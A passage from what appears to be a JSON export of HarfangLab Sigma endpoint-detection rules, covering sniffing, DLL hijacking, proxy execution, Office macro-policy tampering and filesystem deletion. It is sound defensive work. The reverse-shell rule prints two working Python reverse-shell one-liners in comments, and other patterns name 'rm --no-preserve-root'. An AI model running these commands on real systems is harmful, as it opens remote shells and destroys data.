"content": "title: Network Sniffed via tshark (macOS)\nid: 3085e5ea-4be0-4a6c-b0e8-442cc81ed08f\ndescription: |\n Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\n It is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\n It is recommended to investigate activity surrounding this alert to determine if the usage of this software is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/05/10\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Tshark\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/tshark'\n\n exclusion_cellar_data_analysis:\n ParentImage|endswith: 'opt/homebrew/Cellar/python@3.??/3.*/Frameworks/Python.framework/Versions/3.??/Resources/Python.app/Contents/MacOS/Python'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3085e5ea-4be0-4a6c-b0e8-442cc81ed08f",
"rule_name": "Network Sniffed via tshark (macOS)",
"rule_description": "Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\nIt is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\nIt is recommended to investigate activity surrounding this alert to determine if the usage of this software is legitimate.\n",
"rule_creation_date": "2024-05-10",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "309b6676-766c-4e8f-9570-9385f7522c2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604123Z",
"creation_date": "2026-03-23T11:45:34.604126Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604134Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2024/11/robotdropper-automates-delivery-of-multiple-infostealers",
"https://trac-labs.com/advancing-through-the-cyberfront-legionloader-commander-6af38ebe39d4"
],
"name": "t1560_001_unrar_decompress_robotdropper.yml",
"content": "title: RobotDropper Archiver Tool Execution\nid: 309b6676-766c-4e8f-9570-9385f7522c2e\ndescription: |\n Detects when the archiver tool WinRAR is used with arguments specific to RobotDropper.\n These parameters are used by threat actors to uncompress the password protected archive containing the payload.\n The payload is usually a Dll used for DLL Side-Loading.\nreferences:\n - https://blogs.blackberry.com/en/2024/11/robotdropper-automates-delivery-of-multiple-infostealers\n - https://trac-labs.com/advancing-through-the-cyberfront-legionloader-commander-6af38ebe39d4\ndate: 2025/01/08\nmodified: 2025/06/30\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - attack.t1560.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Loader.RobotDropper\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_rar:\n CommandLine|contains: '*\\AppData\\Roaming\\\\*\\unrar.exe x -p* -o+ *.rar'\n ParentImage: '?:\\Windows\\System32\\msiexec.exe'\n\n selection_7z:\n CommandLine|contains: '*\\AppData\\Roaming\\\\*\\7z.exe x *\\AppData\\Roaming\\\\* -oC*\\AppData\\Roaming\\\\* -y -p*'\n GrandparentImage: '?:\\Windows\\System32\\msiexec.exe'\n condition: 1 of selection_*\nlevel: high\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "309b6676-766c-4e8f-9570-9385f7522c2e",
"rule_name": "RobotDropper Archiver Tool Execution",
"rule_description": "Detects when the archiver tool WinRAR is used with arguments specific to RobotDropper.\nThese parameters are used by threat actors to uncompress the password protected archive containing the payload.\nThe payload is usually a Dll used for DLL Side-Loading.\n",
"rule_creation_date": "2025-01-08",
"rule_modified_date": "2025-06-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1560",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088132Z",
"creation_date": "2026-03-23T11:45:34.088134Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088138Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0gtweet/status/1581185123218690048",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_tpmtool.yml",
"content": "title: Proxy Execution via TpmTool.exe\nid: 30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28\ndescription: |\n Detects the suspicious execution of TpmTool.exe as a proxy to launch another application.\n Attackers must place a malicious logman.exe file in the same folder as TpmTool, which will then be executed.\n This technique can be used to bypass security restrictions that are based on the parent process.\n It is recommended to analyze the the execution chain to look for malicious processes as well as to analyze the logman.exe process and determine its legitimacy.\nreferences:\n - https://twitter.com/0gtweet/status/1581185123218690048\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/10/27\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.TpmTool\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_grandparent:\n GrandparentCommandLine|contains|all:\n - 'drivertracing'\n - 'stop'\n\n selection_parent:\n ParentCommandLine|endswith: '\\cmd.exe /c logman.exe stop TPMTRACE -ets'\n\n filter_legitimate:\n OriginalFileName: 'Logman.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28",
"rule_name": "Proxy Execution via TpmTool.exe",
"rule_description": "Detects the suspicious execution of TpmTool.exe as a proxy to launch another application.\nAttackers must place a malicious logman.exe file in the same folder as TpmTool, which will then be executed.\nThis technique can be used to bypass security restrictions that are based on the parent process.\nIt is recommended to analyze the the execution chain to look for malicious processes as well as to analyze the logman.exe process and determine its legitimacy.\n",
"rule_creation_date": "2022-10-27",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "310c3bfc-817d-4a9b-bcb8-d1c7a7835b67",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588794Z",
"creation_date": "2026-03-23T11:45:34.588797Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588805Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cmdl32.yml",
"content": "title: DLL Hijacking via cmdl32.exe\nid: 310c3bfc-817d-4a9b-bcb8-d1c7a7835b67\ndescription: |\n Detects potential Windows DLL Hijacking via cmdl32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cmdl32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\cmpbk32.dll'\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\WINHTTP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "310c3bfc-817d-4a9b-bcb8-d1c7a7835b67",
"rule_name": "DLL Hijacking via cmdl32.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cmdl32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3173c69e-b742-4068-89fd-0dcb22d5d4d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093500Z",
"creation_date": "2026-03-23T11:45:34.093502Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093507Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
"https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/"
],
"name": "t1562_001_office_disable_security_policy.yml",
"content": "title: Microsoft Office Security Policy Disabled\nid: 3173c69e-b742-4068-89fd-0dcb22d5d4d1\ndescription: |\n Detects when policy regarding Office applications security is set to disabled.\n This rule is triggered when:\n - macro execution policy is set to allow any macro (signed and unsigned) to execute automatically.\n - a protected view policy is set to be disabled for all documents.\n Some attackers set those values upon compromising endpoints to ease further exploitations in the future.\n It is recommended to investigate the process that set the registry key for suspicious activities.\nreferences:\n - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\ndate: 2020/09/28\nmodified: 2025/04/24\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Details: 'DWORD (0x00000001)' # value 1 == No Security checks for macros (Not recommended, code in all documents can run)\n TargetObject:\n # covers \\office\\12.0/14.0/16.0... 
\\Word / Excel\\Security\\VBAWarnings\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\VBAWarnings'\n # disable Protected View for files downloaded from the internet.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableInternetFilesInPV'\n # disable Protected View for files located in unsafe locations (temporary directories,...)\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableUnsafeLocationsInPV'\n # disable Protected View for files containing attachements.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableAttachementsInPV'\n # enable all macros without warns.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\Level'\n\n # For office we detect only if the modification is related to a suspicious action (via a macro for example)\n selection_office:\n ProcessOriginalFileName:\n - 'Excel.exe'\n - 'Lync.exe'\n - 'MSACCESS.EXE'\n - 'OneNote.exe'\n - 'Outlook.exe'\n - 'POWERPNT.EXE'\n - 'WinWord.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Corporation'\n\n filter_office_ui:\n StackTrace|contains: '\\Mso??UIwin32client.dll!'\n\n exclusion_services:\n Image|endswith:\n - '\\windows\\system32\\svchost.exe'\n - '\\windows\\syswow64\\svchost.exe'\n - '\\windows\\system32\\services.exe'\n\n exclusion_windowsupdate:\n Image: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessParentImage:\n - '*\\WindowsUpdateBox.exe'\n - '*\\sources\\setupprep.exe'\n\n exclusion_citrix_profile_manager:\n Image: '?:\\Program Files\\Citrix\\User Profile Manager\\UserProfileManager.exe'\n\n exclusion_ivanti:\n Image:\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgent.exe'\n\n exclusion_sagekey:\n Image: '?:\\Program Files (x86)\\Common Files\\Sagekey Software\\StartAccess_2003.exe'\n\n exclusion_ecscad:\n 
Image: '?:\\Program Files\\MuM MT\\ecscad 2016\\ecscad\\EcsController.exe'\n\n exclusion_msaaccess:\n Image|endswith: '\\MSACCESS.EXE'\n ProcessParentImage|endswith: '\\MSACCESS*.EXE'\n ProcessGrandparentImage|endswith: '\\e.magnus.exe'\n\n exclusion_intersystems:\n ProcessOriginalFileName: 'CWS.exe'\n\n exclusion_share:\n ProcessProcessName:\n - 'reg.exe'\n - 'regedit.exe'\n - 'cscript.exe'\n ProcessCommandLine|contains: '\\\\\\\\'\n\n exclusion_res_software:\n ProcessParentImage: '?:\\Program Files (x86)\\RES Software\\Workspace Manager\\pfwsmgr.exe'\n\n exclusion_magnus:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\BL\\BL\\bin\\e.magnus.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Corporation'\n\n exclusion_aucotec:\n ProcessImage: '?:\\Program Files (x86)\\Aucotec\\Engineering Base *\\bin\\EngineeringBase.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'AUCOTEC AG'\n\n exclusion_natus:\n ProcessOriginalFileName:\n - 'Wave.exe'\n - 'XLDB.EXE'\n ProcessSigned: 'true'\n ProcessSignature : 'Natus Medical Incorporated'\n\n exclusion_immidio:\n ProcessParentImage: '?:\\Program Files\\Immidio\\Flex Profiles\\FlexService.exe'\n\n condition: ((selection and not selection_office) or (selection and selection_office and not filter_office_ui)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3173c69e-b742-4068-89fd-0dcb22d5d4d1",
"rule_name": "Microsoft Office Security Policy Disabled",
"rule_description": "Detects when policy regarding Office applications security is set to disabled.\nThis rule is triggered when:\n - macro execution policy is set to allow any macro (signed and unsigned) to execute automatically.\n - a protected view policy is set to be disabled for all documents.\nSome attackers set those values upon compromising endpoints to ease further exploitations in the future.\nIt is recommended to investigate the process that set the registry key for suspicious activities.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2025-04-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "31777514-089e-478f-8335-ce2e3f30e79e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597347Z",
"creation_date": "2026-03-23T11:45:34.597353Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597364Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/rm.1.html",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-8---delete-filesystem---linux",
"https://attack.mitre.org/techniques/T1485/",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1485_delete_filesystem_linux.yml",
"content": "title: Filesystem Deletion\nid: 31777514-089e-478f-8335-ce2e3f30e79e\ndescription: |\n Detects the execution of rm, a command to remove files or directories with a specific option related to filesystem deletion.\n Adversaries may delete filesystems to hide their intrusion activity or to perform data destruction.\n It is recommended to investigate previous alerts on this machine to hunt for any malicious activity.\nreferences:\n - https://man7.org/linux/man-pages/man1/rm.1.html\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-8---delete-filesystem---linux\n - https://attack.mitre.org/techniques/T1485/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2023/01/06\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1485\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Deletion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/rm'\n CommandLine|contains: '--no-preserve-root'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "31777514-089e-478f-8335-ce2e3f30e79e",
"rule_name": "Filesystem Deletion",
"rule_description": "Detects the execution of rm, a command to remove files or directories with a specific option related to filesystem deletion.\nAdversaries may delete filesystems to hide their intrusion activity or to perform data destruction.\nIt is recommended to investigate previous alerts on this machine to hunt for any malicious activity.\n",
"rule_creation_date": "2023-01-06",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "319422fe-e9e9-4e50-becd-b946bfa14f25",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619443Z",
"creation_date": "2026-03-23T11:45:34.619445Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619449Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://attack.mitre.org/techniques/T1059/006/"
],
"name": "t1059_006_reverse_shell_python_linux.yml",
"content": "title: Reverse Shell Executed via Python (Linux)\nid: 319422fe-e9e9-4e50-becd-b946bfa14f25\ndescription: |\n Detects the suspicious usage of Python related to reverse shells.\n Reverse shells are remote shell connections initiated from a compromised system to a malicious client as a way to bypass firewall rules.\n It is recommended to investigate the process behavior and command-line arguments to determine if the Python execution is legitimate or indicative of malicious activity such as establishing a reverse shell connection.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2022/07/01\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Python\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # export RHOST=\"127.0.0.1\";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n # python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n selection_command:\n CommandLine|contains|all:\n - 'import'\n - 'socket'\n - '.socket('\n - '.connect('\n - 'os.dup2('\n - 'fileno()'\n\n selection_shell:\n CommandLine|contains:\n - '.spawn('\n - '.call('\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "319422fe-e9e9-4e50-becd-b946bfa14f25",
"rule_name": "Reverse Shell Executed via Python (Linux)",
"rule_description": "Detects the suspicious usage of Python related to reverse shells.\nReverse shells are remote shell connections initiated from a compromised system to a malicious client as a way to bypass firewall rules.\nIt is recommended to investigate the process behavior and command-line arguments to determine if the Python execution is legitimate or indicative of malicious activity such as establishing a reverse shell connection.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2025-02-19",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "319b37d1-f75a-4426-9484-efa3e3788527",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592677Z",
"creation_date": "2026-03-23T11:45:34.592681Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592689Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_licensingdiag.yml",
"content": "title: DLL Hijacking via licensingdiag.exe\nid: 319b37d1-f75a-4426-9484-efa3e3788527\ndescription: |\n Detects potential Windows DLL Hijacking via licensingdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'licensingdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\CLIPC.dll'\n - '\\fastprox.dll'\n - '\\licensingdiagspp.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and 
not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
